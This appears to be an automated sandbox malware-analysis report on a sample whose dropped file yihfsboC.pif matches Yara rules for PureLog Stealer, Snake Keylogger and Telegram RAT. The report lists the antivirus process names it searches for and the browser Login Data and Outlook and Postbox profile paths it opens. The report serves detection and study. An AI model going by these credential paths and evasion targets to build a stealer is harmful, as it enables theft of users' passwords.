            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: avgemc.exe
            Source: EPTMAcgvNZ.exe, 00000000.00000002.1413076026.000000007F200000.00000004.00001000.00020000.00000000.sdmp, EPTMAcgvNZ.exe, 00000000.00000003.1326762946.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.00000000008C0000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 0000000E.00000002.2505613508.0000000000870000.00000040.00000400.00020000.00000000.sdmp, yihfsboC.pif, 00000017.00000001.1460585249.00000000004F0000.00000040.00000001.00020000.00000000.sdmp, yihfsboC.pif, 0000001A.00000002.2505611445.00000000004F0000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

            Stealing of Sensitive Information

            barindex
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\Public\Libraries\yihfsboC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Users\Public\Libraries\yihfsboC.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\Public\Libraries\yihfsboC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\Public\Libraries\yihfsboC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\Public\Libraries\yihfsboC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Users\Public\Libraries\yihfsboC.pifFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
            Source: C:\Users\Public\Libraries\yihfsboC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected PureLog Stealer
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2b4c0000.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90f08.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.3.yihfsboC.pif.327be688.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34860000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34860000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6b98e.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29915570.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35955570.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27066478.12.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0f08.13.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.3598e790.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35956478.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2994e790.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0000.14.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690000.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285db98e.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342dc896.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.3.yihfsboC.pif.268cecc8.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35955570.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2994e790.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.3.yihfsboC.pif.268cecc8.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0f08.13.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690f08.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.28be0000.15.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29916478.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.3598e790.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.285a0000.14.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29916478.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.2709e790.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6c896.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285dc896.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90f08.8.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27065570.11.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6c896.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342db98e.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285dc896.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2ae90000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.3.yihfsboC.pif.327be688.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.35956478.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.28be0000.15.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.285db98e.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.2b4c0000.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27066478.12.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.34690f08.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.25d6b98e.8.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342db98e.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 23.2.yihfsboC.pif.342dc896.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.3.yihfsboC.pif.24219998.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.2709e790.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.2.yihfsboC.pif.27065570.11.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.3.yihfsboC.pif.24219998.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.yihfsboC.pif.29915570.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR
            Yara detected Telegram RAT
            Source: Yara matchFile source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7240, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7660, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: yihfsboC.pif PID: 7924, type: MEMORYSTR

            Mitre Att&ck Matrix

